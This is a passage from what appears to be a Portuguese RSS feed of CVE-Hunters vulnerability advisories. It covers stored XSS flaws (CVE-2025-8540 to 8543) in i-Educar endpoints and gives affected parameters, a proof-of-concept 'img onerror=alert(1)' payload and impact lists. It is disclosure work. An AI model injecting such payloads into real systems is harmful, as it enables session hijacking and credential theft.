&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8540/image.png&amp;#34;
	width=&amp;#34;629&amp;#34;
	height=&amp;#34;255&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8540/image_hu_359015b5f1096a2a.png 480w, /p/cve-2025-8540/image_hu_3bdd2dd3ec479caf.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;246&amp;#34;
		data-flex-basis=&amp;#34;592px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8540.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8540.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 05 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8541</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8541/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8541/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8541-cross-site-scripting-xss-armazenado-no-endpoint-public_uf_cadphp-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-8541: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;public_uf_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8541&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8541&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;public_uf_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;public_uf_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8541-cross-site-scripting-xss-armazenado-no-endpoint-public_uf_cadphp-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-8541: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;public_uf_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8541&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8541&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;public_uf_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;public_uf_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(1)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8541/image.png&amp;#34;
	width=&amp;#34;622&amp;#34;
	height=&amp;#34;277&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8541/image_hu_18e90d6158627beb.png 480w, /p/cve-2025-8541/image_hu_cbe4a54f17fc1f35.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;224&amp;#34;
		data-flex-basis=&amp;#34;538px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8541.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8541.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 05 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8542</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8542/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8542/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8542-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-empresas_cadphp&amp;#34;&amp;gt;CVE-2025-8542: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;empresas_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8542&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8542&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;empresas_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;fantasia&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;razao_social&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;empresas_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8542-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-empresas_cadphp&amp;#34;&amp;gt;CVE-2025-8542: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;empresas_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8542&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8542&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;empresas_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;fantasia&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;razao_social&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;empresas_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;fantasia&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;razao_social&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;fantasia&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;razao_social&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(1)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8542/image.png&amp;#34;
	width=&amp;#34;612&amp;#34;
	height=&amp;#34;242&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8542/image_hu_7e7a148fcd72d209.png 480w, /p/cve-2025-8542/image_hu_ebe59eb9954b9d45.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Parâmetro “fantasia”&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;252&amp;#34;
		data-flex-basis=&amp;#34;606px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8542/image-1.png&amp;#34;
	width=&amp;#34;638&amp;#34;
	height=&amp;#34;246&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8542/image-1_hu_6d47618d6d2bc8d0.png 480w, /p/cve-2025-8542/image-1_hu_e2e58bf53ac570b9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Parâmetro “razao_social”&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;259&amp;#34;
		data-flex-basis=&amp;#34;622px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8542.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8542.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 05 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8543</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8543/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8543/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8543-cross-site-scripting-xss-armazenado-no-endpoint-educar_raca_cadphp-parâmetro-nm_raca&amp;#34;&amp;gt;CVE-2025-8543: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_raca_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nm_raca&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8543&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8543&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
